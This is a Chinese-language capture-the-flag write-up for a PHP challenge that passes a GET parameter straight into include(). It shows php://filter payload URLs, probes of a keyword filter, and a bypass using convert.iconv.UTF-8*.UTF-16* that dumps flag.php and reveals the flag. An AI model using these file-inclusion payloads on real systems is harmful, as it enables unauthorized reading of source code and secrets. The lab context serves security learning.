<?php
highlight_file(__FILE__);
include("./check.php");
if(isset($_GET['filename'])){
$filename = $_GET['filename'];
include($filename);
}
?>
这里有个include filename,题干幼教文件包含,直接运用文件包含的payload试一下,比如:php://filter套路
http://61.147.171.105:53224/?filename=php://filter/convert.base64-encode/resource=flag.php
返回
<?php
highlight_file(__FILE__);
include("./check.php");
if(isset($_GET['filename'])){
$filename = $_GET['filename'];
include($filename);
}
?>
do not hack!
do not hack,说明存在waf检查,那我们要做的就是如何绕过检查,先试一下究竟是在检查什么1.
http://61.147.171.105:53224/?filename=php://filter/convert.ba1se64-encode/resource=flag.php
2.
http://61.147.171.105:53224/?filename=php://filter/convert.base64-en1code/resource=flag.php
3.
http://61.147.171.105:53224/?filename=php://filter/convert.ba1se64-en1code/resource=flag.php
使用方法
convert.iconv.<input-encoding>.<output-encoding>
or
convert.iconv.<input-encoding>/<output-encoding>
<input-encoding>和<output-encoding> 就是编码方式,有如下几种;
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
http://61.147.171.105:53224/?filename=php://filter/convert.iconv.UTF-8*.UTF-16*/resource=index.php
返回
<?php
highlight_file(__FILE__);
include("./check.php");
if(isset($_GET['filename'])){
$filename = $_GET['filename'];
include($filename);
}
?>
��<�?php highlight_file(__FILE__); include("./check.php"); if(isset($_GET['filename'])){ $filename = $_GET['filename']; include($filename); } ?>
http://61.147.171.105:53224/?filename=php://filter/convert.iconv.UTF-8*.UTF-16*/resource=flag.php
boom, 得到cyberpeace{054e8c47d7f3684c3022bc1f8313a963}